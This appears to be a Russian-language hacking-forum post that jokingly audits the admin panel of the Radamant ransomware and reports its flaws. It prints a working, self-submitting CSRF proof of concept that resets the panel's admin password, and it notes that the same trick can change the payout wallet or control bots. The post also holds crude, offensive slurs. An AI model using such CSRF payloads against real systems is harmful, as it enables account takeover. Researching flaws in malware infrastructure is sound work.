Криптолокер Radamant [2015]

Буквально пару дней назад, стучится мне какой-то наркоман в жаббер. Говорит, мол есть у него улетная спайсуха с новейшей формулой. И формула настолько крутая, что чтобы упороться, не надо даже курить эту спайсуху, а надо только скачать файл с ней и два раза по нему кликнуть.

Ну я и кликнул два раза.


В общем... Прогрузили мне криптолокер, редиректнули на лендинг, где на ломаном немецком написали, что если админку на баги не проверишь, то кабздец всем твоим файлам:



А мне есть что терять... Пришлось проверять.

Телепатическим сигналом мне были переданы логин/пароль в админку и ссылка на сендспейс с исходниками панели. Зашел:



Осмотрелся. Список жертв безумца, отсортированный по странам:



Список расширений файлов, который будут зашифрованы (всего - чуть больше тысячи):



Список ботов:



Инфа по отдельной жертве:



Общая статистика (к слову, могли бы объеденить с Home):



И наконец, настройки:



Сразу привлекло внимание то, что для того, чтобы задать новый пароль, не нужно знать старый. Проверил - токенов никаких нет. Налицо СЫКА CSRF с возможностью смены пароля админа.

Накидал Poc:

Code:

<html>
<h1>НАША СЛУЖБА И ОПАСНА И ТРУДНА...</h1>
<iframe style="display:none" name="csrf-frame"></iframe>
<form method=POST action=http://radomant/?setting target="csrf-frame" id="csrf-form">
<input type=hidden name=select value=1>
<input type=hidden name=login value=FSB>
<input type=hidden name=password value=1337>
<input type=hidden name=cpassword value=1337>
<input type=hidden name=page value=100>
<input type=submit value=submit style="display:none">
</form>
<script>document.getElementById("csrf-form").submit()</script>
</html>​

Тем же способом можно сменить кошелек для выплат или произвести манипуляции с ботами (удалить бота, расшифровать файлы, сменить ключ и т.д.).

После этого прогнал весь код регулярками. SQL-инъекций, LFI/RFI, RCE, манипуляций с файлами - всего этого нет.

UPDATE. Мой фейл, проглядел sql-инъекцию (). Помню, что смотрел на ту же самую функцию... Лохпидр.

Full Path Disclosure (вывод в ошибке):



На этих страницах бесконечный редирект:



Еще я не понял, что это такое:



Должно быть планировалась партнерка, но ее либо не дописали, либо решили не писать. Увидеть можно это дело, если убрать все параметры из URL. Сохраняет непойми куда ( - 404).

Вот и все.

P.S. Я уверен, что к моменту публикации статьи все баги будут исправлены, а ключ для расшифровки моей восьмидесятитерабайтной коллекции порнухи с карликами-осьминогами в костюмах из кожи гомо-эмо-школьников, играющих в CS с кривыми читами, которые им написал быдлокодер-аутист Анатолий, четвертый год лечащийся от алкоголизма внутривенными инъекциями мытищинского метамфетамина все таки будет получен.

© r00t